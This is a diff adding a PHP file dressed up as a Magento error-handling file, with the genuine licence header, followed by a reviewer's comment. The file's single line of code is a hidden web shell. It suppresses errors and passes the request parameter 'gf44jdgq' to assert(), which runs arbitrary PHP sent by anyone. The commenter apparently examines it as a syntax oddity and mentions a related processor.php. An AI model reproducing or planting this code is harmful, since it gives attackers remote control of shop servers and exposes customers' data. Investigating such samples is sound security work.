corpus/backend/1111516ffedab69ef8050f2aacb0b0a1

```diff
@@ -0,0 +1,31 @@
+<?php
+/**
+ * Magento
+ *
+ * NOTICE OF LICENSE
+ *
+ * This source file is subject to the Open Software License (OSL 3.0)
+ * that is bundled with this package in the file LICENSE.txt.
+ * It is also available through the world-wide-web at this URL:
+ * http://opensource.org/licenses/osl-3.0.php
+ * If you did not receive a copy of the license and are unable to
+ * obtain it through the world-wide-web, please send an email
+ * to license@magentocommerce.com so we can send you a copy immediately.
+ *
+ * DISCLAIMER
+ *
+ * Do not edit or add to this file if you wish to upgrade Magento to newer
+ * versions in the future. If you wish to customize Magento for your
+ * needs please refer to http://www.magentocommerce.com for more information.
+ *
+ * @category    Mage
+ * @package     Errors
+ * @copyright   Copyright (c) 2012 Magento Inc. (http://www.magentocommerce.com)
+ * @license     http://opensource.org/licenses/osl-3.0.php  Open Software License (OSL 3.0)
+ */
+
+error_reporting(0);assert(stripslashes($_REQUEST[gf44jdgq]));error_reporting(E_ALL); 

```

Comment:
It's a bit strange that `gf44jdgq` isn't surrounded by quotes, it looks like a variable at the moment. Is there a change that the quotes are stripped by copying the file, because currently it looks like a syntax error.

I'm also wondering what the content of `processor.php` is with a reference to `gf44jdgq`. Did you find any over there?